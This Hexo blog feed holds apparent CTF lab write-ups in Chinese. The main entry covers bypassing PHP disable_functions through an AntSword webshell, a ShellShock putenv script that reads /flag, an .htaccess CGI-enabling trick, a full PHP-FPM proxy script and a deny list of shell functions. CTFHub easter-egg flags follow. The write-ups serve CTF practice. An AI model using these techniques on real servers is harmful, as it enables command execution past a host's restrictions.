fa85b859c64f3f84c55908730920997283f5974018f9acc18d789e0d63568a28257d70c3e075c8749bad972f38ed1116df0968e0fa94c1746bbbe197566f084f3eb59727f110bd0e1add5fb7dd2cd62eb6a9ee9e59b6de102be9d038ac006ea25c3940df06a6b4c5845b9fb5b6110e2c9d0e0dda4d7e45332e00d3b00ac14b0da2afc6084ac12cbb4439bbd9652dcf3a977cc872d57bc8b687c437f515f13c88e3c329b7ca45b99f911de5b636c3ae177113e957c917aeb716e58bae612c85e9ccaed988b46cac9bec13c81ad6dec2d654a435bd58a9df144eb17f4a33aab95481cd438702f97f171397dabce366bd112436c016896cd859dc6207715a0917f8d4ade1432ad04fc760687127c5ac35167101b99466ad7e91ac6a01bd9f2b2770eb54bbb48ece1f17f540d2d80c08b2e84de423cbe53be1f4d0c5cb3957deab01da340ee9913a475735aff67c9d74709a340b73282813bc414000860cf3dace577619cb39ac3b5c9ee0b8ed6b394b8bde90d7c031fe51a0209a02c444b4ea1de6d546a15a5c6853ecc099327892100755aadf8b1fc92c68b0e3e4c925a2c468a605d94af16da3c200324ad24c20487fad14b4905cab92ea568e692708fea93bf65754248b6b424d440cf05e918ff133c7a400777bac7dbb6837183773dcd3a6fec58dcdc38914a60ca4f271b11f31a7022fbf2d821487b272f4e8a848d9f9d8e142144f10f58e4afd6f5b5c94bd19f21a496d2716e1aa12e06e44345fa151b1c746bb192a7399d0d4fc9fd8b45cbba259d70ecc86396cd2fd5a3d3f46f447893da8c0bb167099f82814b481eb984f2b619bf0ffabee7872532bc30917b79d0be6483954b56bacd49f3c8cd7b8fe6b52daa61b3b6e900e9c3bfe2803346c055d9e66f7a1e4a88e9afc5f513af3cb54859e994317378abc7e309dc3288f9982c9f8b89a6ff98ebe3e865061ccd70da63bbd72fbf931af840a9b8b17a339d3fd2ca2ddbb7353f7354553da08d636c44adf61c30028b04105a1e3621cf76cc850a1a82a411f3daa014c5c5e3c41c45d9c6b6e668ae44b0fff7f92674ddb30960e4f5474f432578dc5adb3c8a4e3bad1384dc7696b56bdfe39873eeff05f03e511d2d189fa2a4ad8bd1e1305bb20111139b409e97bc5b58a8a1df5868da336af249d049b3859599ba0867ac609a4b124c03d45e84700fb95afd9c4d7ac060301aee8b01348c14bb9cc9c4cb0e3dbe51445d7e0b8c128acff958e38e0f748c401cdd5918fe5131458cfb7970751bbf413721865df9c972db1cf88c310cc32d7db8ba2d29a358be2a7436be99c0f76cc7f809ea9d6ecab716c95553b93d387d64c27bcec6658d7c2cce6fd9fe455175d5fb3afdc1d951add7</script>
  <div class="hbe hbe-content">
    <div class="hbe hbe-input hbe-input-default">
      <input class="hbe hbe-input-field hbe-input-field-default" type="password" id="hbePass">
      <label class="hbe hbe-input-label hbe-input-label-default" for="hbePass">
        <span class="hbe hbe-input-label-content hbe-input-label-content-default">Hey, password is required here.</span>
      </label>
    </div>
  </div>
</div>
<script data-pjax src="/lib/hbe.js"></script><link href="/css/hbe.style.css" rel="stylesheet" type="text/css">]]></content>
      <categories>
        <category>随笔</category>
      </categories>
  </entry>
  <entry>
    <title>Bypass disable_function</title>
    <url>/2023/07/Bypass%20disable_function/</url>
    <content><![CDATA[<h2 id="LD-PRELOAD"><a href="#LD-PRELOAD" class="headerlink" title="LD_PRELOAD"></a>LD_PRELOAD</h2><p>时间紧 于是先采用最省时的方法<br>先蚁剑连<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16.png" alt="在这里插入图片描述"><br>发现打不开 flag 文件<br>要使用蚁剑插件<code>绕过disabled function</code></p>
<blockquote>
<p>如果蚁剑插件市场打不开的话可以去 github 搜<br>github 上有说明 按着他的安</p>
</blockquote>
<p>连上之后在蚁剑主页面右键 webshell 使用该插件<br>按照步骤操作<br>成功后把 webshell 地址改为 http:&#x2F;&#x2F;……&#x2F;.antproxy.php<br>在连上就能 tac 了<br><code>tac /flag</code></p>
<h2 id="ShellShock"><a href="#ShellShock" class="headerlink" title="ShellShock"></a>ShellShock</h2><p>进去发现连不上<br>查了下大佬博客说是环境不正常<br>原理如下</p>
<blockquote>
<p>如果环境变量的值以字符() {开头，那么这个变量就会被当作是一个导入函数的定义（Export），这种定义只有在 shell 启动的时候才生效。</p>
</blockquote>
<p>脚本</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$cmd</span> = <span class="string">&quot; tac /flag&gt;/var/www/html/1.txt&quot;</span>;</span><br><span class="line"><span class="title function_ invoke__">putenv</span>(<span class="string">&quot;PHP_DMIND=() &#123; :; &#125;;<span class="subst">$cmd</span>&quot;</span>);</span><br><span class="line"><span class="title function_ invoke__">error_log</span>(<span class="string">&quot;dmind&quot;</span>,<span class="number">1</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">file_get_contents</span>(<span class="string">&quot;/var/www/html/1.txt&quot;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>用蚁剑传进去后<br>浏览器访问这个文件即可在 1.txt 看到 flag<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254011280-13.png" alt="在这里插入图片描述"></p>
<h2 id="Apache-Mod-CGI"><a href="#Apache-Mod-CGI" class="headerlink" title="Apache Mod CGI"></a>Apache Mod CGI</h2><p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254013871-16.png" alt="在这里插入图片描述"></p>
<p>如果.htaccess 文件被攻击者修改的话，攻击者就可以利用 apache 的 mod_cgi 模块，直接绕过 PHP 的任何限制，来执行系统命令</p>
<blockquote>
<p>1.Mod CGI 就是把 PHP 做为 APACHE 一个内置模块，让 apache http 服务器本身能够支持 PHP 语言，不需要每一个请求都通过启动 PHP 解释器来解释 PHP. 2.它可以将 cgi-script 文件或者用户自定义标识头为 cgi-script 的文件通过服务器运行. 3.在.htaccess 文件中可定制用户定义标识头 4.添加 Options +ExecCGI，代表着允许使用 mod_cgi 模块执行 CGI 脚本 5.添加 AddHandler cgi-script .cgi，代表着包含.cgi 扩展名的文件都将被视为 CGI 程序</p>
</blockquote>
<p>条件</p>
<ol>
<li>必须是 apache 环境</li>
<li>mod_cgi 已经启用</li>
<li>必须允许.htaccess 文件，也就是说在 httpd.conf 中，要注意 AllowOverride 选项为 All，而不是 none</li>
<li>必须有权限写.htaccess 文件</li>
</ol>
<h3 id="脚本："><a href="#脚本：" class="headerlink" title="脚本："></a>脚本：</h3><p>.htaccess</p>
<figure class="highlight handlebars"><table><tr><td class="code"><pre><span class="line"><span class="language-xml">Options +ExecCGI AddHandler cgi-script .cgi</span></span><br></pre></td></tr></table></figure>

<p>shell.cgi</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">!/bin/sh</span></span><br><span class="line">echo&amp;&amp;cd &quot;/var/www/html/backdoor&quot;;cat shell.cgi;echo 96642;pwd;echo c26b314f4b</span><br></pre></td></tr></table></figure>

<h3 id="简单方法："><a href="#简单方法：" class="headerlink" title="简单方法："></a>简单方法：</h3><p>蚁剑连<br>还是那个插件 bypass！<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254016967-19.png" alt="在这里插入图片描述"></p>
<h2 id="PHP-FPM"><a href="#PHP-FPM" class="headerlink" title="PHP-FPM"></a>PHP-FPM</h2><ol>
<li>FPM 是 fast-cgi 的协议解析器</li>
<li>webserver 使用 cgi 协议封装好用户的请求发送给 FPM</li>
<li>FPM 按照 cgi 的协议将 TCP 流解析成真正的数据</li>
</ol>
<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254019084-22.png" alt="在这里插入图片描述"><br>蚁剑 bypass<br>模式：FPM<br>地址：127.0.0.1：9000 或 localhost：9000<br>植入后修改 shell 地址为 http:&#x2F;&#x2F;……&#x2F;.antproxy.php</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">get_client_header</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    <span class="variable">$headers</span>=<span class="keyword">array</span>();</span><br><span class="line">    <span class="keyword">foreach</span>(<span class="variable">$_SERVER</span> <span class="keyword">as</span> <span class="variable">$k</span>=&gt;<span class="variable">$v</span>)&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="title function_ invoke__">strpos</span>(<span class="variable">$k</span>,<span class="string">&#x27;HTTP_&#x27;</span>)===<span class="number">0</span>)&#123;</span><br><span class="line">            <span class="variable">$k</span>=<span class="title function_ invoke__">strtolower</span>(<span class="title function_ invoke__">preg_replace</span>(<span class="string">&#x27;/^HTTP/&#x27;</span>, <span class="string">&#x27;&#x27;</span>, <span class="variable">$k</span>));</span><br><span class="line">            <span class="variable">$k</span>=<span class="title function_ invoke__">preg_replace_callback</span>(<span class="string">&#x27;/_\w/&#x27;</span>,<span class="string">&#x27;header_callback&#x27;</span>,<span class="variable">$k</span>);</span><br><span class="line">            <span class="variable">$k</span>=<span class="title function_ invoke__">preg_replace</span>(<span class="string">&#x27;/^_/&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="variable">$k</span>);</span><br><span class="line">            <span class="variable">$k</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;_&#x27;</span>,<span class="string">&#x27;-&#x27;</span>,<span class="variable">$k</span>);</span><br><span class="line">            <span class="keyword">if</span>(<span class="variable">$k</span>==<span class="string">&#x27;Host&#x27;</span>) <span class="keyword">continue</span>;</span><br><span class="line">            <span class="variable">$headers</span>[]=<span class="string">&quot;<span class="subst">$k</span>:<span class="subst">$v</span>&quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="variable">$headers</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">header_callback</span>(<span class="params"><span class="variable">$str</span></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="title function_ invoke__">strtoupper</span>(<span class="variable">$str</span>[<span class="number">0</span>]);</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">parseHeader</span>(<span class="params"><span class="variable">$sResponse</span></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">list</span>(<span class="variable">$headerstr</span>,<span class="variable">$sResponse</span>)=<span class="title function_ invoke__">explode</span>(<span class="string">&quot;</span></span><br><span class="line"><span class="string">&quot;</span>,<span class="variable">$sResponse</span>, <span class="number">2</span>);</span><br><span class="line">    <span class="variable">$ret</span>=<span class="keyword">array</span>(<span class="variable">$headerstr</span>,<span class="variable">$sResponse</span>);</span><br><span class="line">    <span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/^HTTP/1.1 d&#123;3&#125;/&#x27;</span>, <span class="variable">$sResponse</span>))&#123;</span><br><span class="line">        <span class="variable">$ret</span>=<span class="title function_ invoke__">parseHeader</span>(<span class="variable">$sResponse</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="variable">$ret</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="title function_ invoke__">set_time_limit</span>(<span class="number">120</span>);</span><br><span class="line"><span class="variable">$headers</span>=<span class="title function_ invoke__">get_client_header</span>();</span><br><span class="line"><span class="variable">$host</span> = <span class="string">&quot;127.0.0.1&quot;</span>;</span><br><span class="line"><span class="variable">$port</span> = <span class="number">61921</span>;</span><br><span class="line"><span class="variable">$errno</span> = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line"><span class="variable">$errstr</span> = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line"><span class="variable">$timeout</span> = <span class="number">30</span>;</span><br><span class="line"><span class="variable">$url</span> = <span class="string">&quot;/index.php&quot;</span>;</span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">empty</span>(<span class="variable">$_SERVER</span>[<span class="string">&#x27;QUERY_STRING&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$url</span> .= <span class="string">&quot;?&quot;</span>.<span class="variable">$_SERVER</span>[<span class="string">&#x27;QUERY_STRING&#x27;</span>];</span><br><span class="line">&#125;;</span><br><span class="line"><span class="variable">$fp</span> = <span class="title function_ invoke__">fsockopen</span>(<span class="variable">$host</span>, <span class="variable">$port</span>, <span class="variable">$errno</span>, <span class="variable">$errstr</span>, <span class="variable">$timeout</span>);</span><br><span class="line"><span class="keyword">if</span>(!<span class="variable">$fp</span>)&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$method</span> = <span class="string">&quot;GET&quot;</span>;</span><br><span class="line"><span class="variable">$post_data</span> = <span class="string">&quot;&quot;</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$_SERVER</span>[<span class="string">&#x27;REQUEST_METHOD&#x27;</span>]==<span class="string">&#x27;POST&#x27;</span>) &#123;</span><br><span class="line">    <span class="variable">$method</span> = <span class="string">&quot;POST&quot;</span>;</span><br><span class="line">    <span class="variable">$post_data</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="string">&#x27;php://input&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$out</span> = <span class="variable">$method</span>.<span class="string">&quot; &quot;</span>.<span class="variable">$url</span>.<span class="string">&quot; HTTP/1.1\r\n&quot;</span>;</span><br><span class="line"><span class="variable">$out</span> .= <span class="string">&quot;Host: &quot;</span>.<span class="variable">$host</span>.<span class="string">&quot;:&quot;</span>.<span class="variable">$port</span>.<span class="string">&quot;\r\n&quot;</span>;</span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">empty</span>(<span class="variable">$_SERVER</span>[<span class="string">&#x27;CONTENT_TYPE&#x27;</span>])) &#123;</span><br><span class="line">    <span class="variable">$out</span> .= <span class="string">&quot;Content-Type: &quot;</span>.<span class="variable">$_SERVER</span>[<span class="string">&#x27;CONTENT_TYPE&#x27;</span>].<span class="string">&quot;\r\n&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$out</span> .= <span class="string">&quot;Content-length:&quot;</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$post_data</span>).<span class="string">&quot;\r\n&quot;</span>;</span><br><span class="line"><span class="variable">$out</span> .= <span class="title function_ invoke__">implode</span>(<span class="string">&quot;\r\n&quot;</span>,<span class="variable">$headers</span>);</span><br><span class="line"><span class="variable">$out</span> .= <span class="string">&quot;\r\n\r\n&quot;</span>;</span><br><span class="line"><span class="variable">$out</span> .= <span class="string">&quot;&quot;</span>.<span class="variable">$post_data</span>;</span><br><span class="line"><span class="title function_ invoke__">fputs</span>(<span class="variable">$fp</span>, <span class="variable">$out</span>);</span><br><span class="line"><span class="variable">$response</span> = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line"><span class="keyword">while</span>(<span class="variable">$row</span>=<span class="title function_ invoke__">fread</span>(<span class="variable">$fp</span>, <span class="number">4096</span>))&#123;</span><br><span class="line">    <span class="variable">$response</span> .= <span class="variable">$row</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="title function_ invoke__">fclose</span>(<span class="variable">$fp</span>);</span><br><span class="line"><span class="variable">$pos</span> = <span class="title function_ invoke__">strpos</span>(<span class="variable">$response</span>, <span class="string">&quot;\r\n\r\n&quot;</span>);</span><br><span class="line"><span class="variable">$response</span> = <span class="title function_ invoke__">substr</span>(<span class="variable">$response</span>, <span class="variable">$pos</span>+<span class="number">4</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$response</span>;</span><br></pre></td></tr></table></figure>

<h2 id="UAF"><a href="#UAF" class="headerlink" title="UAF"></a>UAF</h2><h3 id="GC"><a href="#GC" class="headerlink" title="GC"></a>GC</h3><blockquote>
<p>利用的是 PHP Garbage Collector 程序中的堆溢出触发</p>
</blockquote>
<p><a href="https://bugs.php.net/bug.php?id=72530">题目附件</a><br><em>其实蚁剑的 reference 就有这附件 包括后面的大佬脚本</em><br>可以用蚁剑一把梭<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254029334-25.png" alt="在这里插入图片描述"></p>
<p>另附<br><code>[大佬poc](https://github.com/mm0r1/exploits)</code><br>UAF 的脚本里面都有<br><code>tql！</code></p>
<h3 id="Json-Serializer-UAF"><a href="#Json-Serializer-UAF" class="headerlink" title="Json Serializer UAF"></a>Json Serializer UAF</h3><blockquote>
<p>漏洞利用 json 在序列化中的堆溢出触发 bypass，漏洞为 bug #77843</p>
</blockquote>
<p>蚁剑一把梭</p>
<h3 id="Backtrace-UAF"><a href="#Backtrace-UAF" class="headerlink" title="Backtrace UAF"></a>Backtrace UAF</h3><blockquote>
<p>漏洞利用的是 debug_backtrace 这个函数，可以利用该函数的漏洞返回已经销毁的变量的引用达成堆溢出，漏洞为 bug #76047</p>
</blockquote>
<h2 id="FFI"><a href="#FFI" class="headerlink" title="FFI"></a>FFI</h2><p><a href="https://www.laruence.com/2020/03/11/5475.html">PHP FFI 详解</a></p>
<blockquote>
<p><code>**disabled function:**</code><br>pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,dl,mail,system,putenv</p>
</blockquote>
<h2 id="iconv"><a href="#iconv" class="headerlink" title="iconv"></a>iconv</h2><ul>
<li>github.com&#x2F;AntSwordProject&#x2F;AntSword-Labs&#x2F;tree&#x2F;master&#x2F;bypass_disable_functions&#x2F;9&#x2F;</li>
<li><a href="https://gist.github.com/LoadLow/90b60bd5535d6c3927bb24d5f9955b80">https://gist.github.com/LoadLow/90b60bd5535d6c3927bb24d5f9955b80</a></li>
</ul>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">get_client_header</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    <span class="variable">$headers</span>=<span class="keyword">array</span>();</span><br><span class="line">    <span class="keyword">foreach</span>(<span class="variable">$_SERVER</span> <span class="keyword">as</span> <span class="variable">$k</span>=&gt;<span class="variable">$v</span>)&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="title function_ invoke__">strpos</span>(<span class="variable">$k</span>,<span class="string">&#x27;HTTP_&#x27;</span>)===<span class="number">0</span>)&#123;</span><br><span class="line">            <span class="variable">$k</span>=<span class="title function_ invoke__">strtolower</span>(<span class="title function_ invoke__">preg_replace</span>(<span class="string">&#x27;/^HTTP/&#x27;</span>, <span class="string">&#x27;&#x27;</span>, <span class="variable">$k</span>));</span><br><span class="line">            <span class="variable">$k</span>=<span class="title function_ invoke__">preg_replace_callback</span>(<span class="string">&#x27;/_\w/&#x27;</span>,<span class="string">&#x27;header_callback&#x27;</span>,<span class="variable">$k</span>);</span><br><span class="line">            <span class="variable">$k</span>=<span class="title function_ invoke__">preg_replace</span>(<span class="string">&#x27;/^_/&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="variable">$k</span>);</span><br><span class="line">            <span class="variable">$k</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;_&#x27;</span>,<span class="string">&#x27;-&#x27;</span>,<span class="variable">$k</span>);</span><br><span class="line">            <span class="keyword">if</span>(<span class="variable">$k</span>==<span class="string">&#x27;Host&#x27;</span>) <span class="keyword">continue</span>;</span><br><span class="line">            <span class="variable">$headers</span>[]=<span class="string">&quot;<span class="subst">$k</span>:<span class="subst">$v</span>&quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="variable">$headers</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">header_callback</span>(<span class="params"><span class="variable">$str</span></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="title function_ invoke__">strtoupper</span>(<span class="variable">$str</span>[<span class="number">0</span>]);</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">parseHeader</span>(<span class="params"><span class="variable">$sResponse</span></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">list</span>(<span class="variable">$headerstr</span>,<span class="variable">$sResponse</span>)=<span class="title function_ invoke__">explode</span>(<span class="string">&quot;</span></span><br><span class="line"><span class="string">&quot;</span>,<span class="variable">$sResponse</span>, <span class="number">2</span>);</span><br><span class="line">    <span class="variable">$ret</span>=<span class="keyword">array</span>(<span class="variable">$headerstr</span>,<span class="variable">$sResponse</span>);</span><br><span class="line">    <span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/^HTTP/1.1 d&#123;3&#125;/&#x27;</span>, <span class="variable">$sResponse</span>))&#123;</span><br><span class="line">        <span class="variable">$ret</span>=<span class="title function_ invoke__">parseHeader</span>(<span class="variable">$sResponse</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="variable">$ret</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="title function_ invoke__">set_time_limit</span>(<span class="number">120</span>);</span><br><span class="line"><span class="variable">$headers</span>=<span class="title function_ invoke__">get_client_header</span>();</span><br><span class="line"><span class="variable">$host</span> = <span class="string">&quot;127.0.0.1&quot;</span>;</span><br><span class="line"><span class="variable">$port</span> = <span class="number">63947</span>;</span><br><span class="line"><span class="variable">$errno</span> = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line"><span class="variable">$errstr</span> = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line"><span class="variable">$timeout</span> = <span class="number">30</span>;</span><br><span class="line"><span class="variable">$url</span> = <span class="string">&quot;/index.php&quot;</span>;</span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">empty</span>(<span class="variable">$_SERVER</span>[<span class="string">&#x27;QUERY_STRING&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$url</span> .= <span class="string">&quot;?&quot;</span>.<span class="variable">$_SERVER</span>[<span class="string">&#x27;QUERY_STRING&#x27;</span>];</span><br><span class="line">&#125;;</span><br><span class="line"><span class="variable">$fp</span> = <span class="title function_ invoke__">fsockopen</span>(<span class="variable">$host</span>, <span class="variable">$port</span>, <span class="variable">$errno</span>, <span class="variable">$errstr</span>, <span class="variable">$timeout</span>);</span><br><span class="line"><span class="keyword">if</span>(!<span class="variable">$fp</span>)&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$method</span> = <span class="string">&quot;GET&quot;</span>;</span><br><span class="line"><span class="variable">$post_data</span> = <span class="string">&quot;&quot;</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$_SERVER</span>[<span class="string">&#x27;REQUEST_METHOD&#x27;</span>]==<span class="string">&#x27;POST&#x27;</span>) &#123;</span><br><span class="line">    <span class="variable">$method</span> = <span class="string">&quot;POST&quot;</span>;</span><br><span class="line">    <span class="variable">$post_data</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="string">&#x27;php://input&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$out</span> = <span class="variable">$method</span>.<span class="string">&quot; &quot;</span>.<span class="variable">$url</span>.<span class="string">&quot; HTTP/1.1\r\n&quot;</span>;</span><br><span class="line"><span class="variable">$out</span> .= <span class="string">&quot;Host: &quot;</span>.<span class="variable">$host</span>.<span class="string">&quot;:&quot;</span>.<span class="variable">$port</span>.<span class="string">&quot;\r\n&quot;</span>;</span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">empty</span>(<span class="variable">$_SERVER</span>[<span class="string">&#x27;CONTENT_TYPE&#x27;</span>])) &#123;</span><br><span class="line">    <span class="variable">$out</span> .= <span class="string">&quot;Content-Type: &quot;</span>.<span class="variable">$_SERVER</span>[<span class="string">&#x27;CONTENT_TYPE&#x27;</span>].<span class="string">&quot;\r\n&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$out</span> .= <span class="string">&quot;Content-length:&quot;</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$post_data</span>).<span class="string">&quot;\r\n&quot;</span>;</span><br><span class="line"><span class="variable">$out</span> .= <span class="title function_ invoke__">implode</span>(<span class="string">&quot;\r\n&quot;</span>,<span class="variable">$headers</span>);</span><br><span class="line"><span class="variable">$out</span> .= <span class="string">&quot;\r\n\r\n&quot;</span>;</span><br><span class="line"><span class="variable">$out</span> .= <span class="string">&quot;&quot;</span>.<span class="variable">$post_data</span>;</span><br><span class="line"><span class="title function_ invoke__">fputs</span>(<span class="variable">$fp</span>, <span class="variable">$out</span>);</span><br><span class="line"><span class="variable">$response</span> = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line"><span class="keyword">while</span>(<span class="variable">$row</span>=<span class="title function_ invoke__">fread</span>(<span class="variable">$fp</span>, <span class="number">4096</span>))&#123;</span><br><span class="line">    <span class="variable">$response</span> .= <span class="variable">$row</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="title function_ invoke__">fclose</span>(<span class="variable">$fp</span>);</span><br><span class="line"><span class="variable">$pos</span> = <span class="title function_ invoke__">strpos</span>(<span class="variable">$response</span>, <span class="string">&quot;\r\n\r\n&quot;</span>);</span><br><span class="line"><span class="variable">$response</span> = <span class="title function_ invoke__">substr</span>(<span class="variable">$response</span>, <span class="variable">$pos</span>+<span class="number">4</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$response</span>;</span><br></pre></td></tr></table></figure>
]]></content>
      <categories>
        <category>web</category>
      </categories>
      <tags>
        <tag>web</tag>
        <tag>提权</tag>
      </tags>
  </entry>
  <entry>
    <title>ctfhub-彩蛋</title>
    <url>/2023/07/CTFHub%E5%BD%A9%E8%9B%8B/</url>
    <content><![CDATA[<h2 id="工具-彩蛋"><a href="#工具-彩蛋" class="headerlink" title="工具 彩蛋"></a>工具 彩蛋</h2><p>一开始的想法是工具一共有 8 页，想抓个包改下看看有没有第九页<br>抓包后发现不管哪一页 limit 都是 12 但 offset 在变化<br>于是<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254043338-28.png" alt="在这里插入图片描述">这样设置参数<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254045357-31.png" alt="在这里插入图片描述">在长度为 1000 到 6、7 千左右随便一个双击后 <code>点击响应</code> 看<code>响应</code>包<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254048636-34.png" alt="在这里插入图片描述">在最后一行</p>
<h2 id="首页-彩蛋"><a href="#首页-彩蛋" class="headerlink" title="首页 彩蛋"></a>首页 彩蛋</h2><p><a href="https://api.ctfhub.com/">api</a>中间框内隐藏着两行字<br>ctfhub{c18732f48a96c40d40a06e74b1305706}<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254050970-37.png" alt="在这里插入图片描述"></p>
<h2 id="题目入口-彩蛋"><a href="#题目入口-彩蛋" class="headerlink" title="题目入口 彩蛋"></a>题目入口 彩蛋</h2><p>在 web-ssrf 中间那一列的某些题传参错误时会出现<br>详情见<a href="https://blog.csdn.net/qq_62414126/article/details/122881838">ctfhub-ssrf</a>post 最后一行介绍</p>
<h2 id="公众号"><a href="#公众号" class="headerlink" title="公众号"></a>公众号</h2><p>公众号彩蛋坑的一批！<br>首先要先绑定<br>然后点彩蛋<br>它提示要回复正确的关键词<br>我*#@%<br>我回复过</p>
<blockquote>
<p>彩蛋 关键词 egg ctfhub CTFHub 拿来把你 CTFer 自己人 ……</p>
</blockquote>
<p>到底没想到竟然是 flag</p>
<h2 id="投稿提交-彩蛋"><a href="#投稿提交-彩蛋" class="headerlink" title="投稿提交 彩蛋"></a>投稿提交 彩蛋</h2><p>只找到了前半部分<br>分别在题目提交和 wp 提交页面的最后</p>
<figure class="highlight css"><table><tr><td class="code"><pre><span class="line">ctfhub&#123;<span class="number">029</span>e02eb3a1</span><br><span class="line">	e8c49b1132b5</span><br><span class="line">	<span class="number">15</span>b652a5f3a8</span><br><span class="line">	<span class="number">62013</span>&#125;</span><br></pre></td></tr></table></figure>

